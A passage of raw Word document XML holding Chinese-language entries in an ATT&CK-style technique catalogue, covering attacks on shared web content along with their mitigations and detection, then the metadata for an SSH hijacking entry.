          <w:p w14:paraId="60E95194" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76295353" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009C1E82" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6E885F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以通过包含网站的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webroot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容目录的开放网络文件共享将恶意内容添加到内部可访问的网站，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器浏览到该内容以使服务器执行恶意内容。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意内容通常在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器进程的上下文和权限下运行，通常会产生本地系统或管理权限，具体取决于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的配置方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7269AB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BA0A66" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种共享访问和远程执行机制可用于横向移动到运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的系统。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，运行具有开放网络共享的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器可以允许攻击者上载远程访问工具和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，以在访问特定页面时在运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的系统上执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CB80F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F91CEF" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="2B084E44" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6F3E09DD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3A0D4B23" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="6AD1084E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AF444B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制通过网络对资源的访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76DBD6EC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁止远程访问用于提供</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webroot</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或其他目录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="1F157C00" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703879D1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A62CE7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果系统和</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器未得到适当保护以限制未经身份验证的网络共享访问和网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统隔离，那么允许开放式开发和测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容并允许用户在企业网络上设置自己的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器的网络可能特别容易受到攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="1FB884B2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1642DCED" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E222A2B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果系统和</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器没有得到适当保护以限制特权帐户使用和未经身份验证的网络共享访问，那么允许开放式开发和测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容并允许用户在企业网络上设置自己的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器的网络可能特别容易受到攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="41AD872E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04C768AD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71075750" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁止在</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webroot</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的目录上执行。确保对可通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器访问的目录具有</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>适当的权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="6BE15096" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3927D7F0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>用户帐户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4893DF10" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器进程的权限仅是不使用内置帐户所需的权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>相反，创建特定帐户以限制多个系统中不必要的访问或权限重叠。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DDD7A49" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A91CA8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD4694" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D9371B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>使用文件和进程监视来检测何时通过非正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务器进程的进程或在正常管理时间段之外写入文件时将文件写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务器的时间。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>使用进程监视来标识在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2636">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务器上运行的正常进程，并检测通常不执行的进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764964D1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="039AF8DF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78ADA9F2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> T1184</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="395DAB37" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="597E3206" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5951F03D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>服务，配置好信任关系，建立好连接</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="377A28C1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="647A50B9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4377B687" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>: Anastasios Pingios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A23368" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
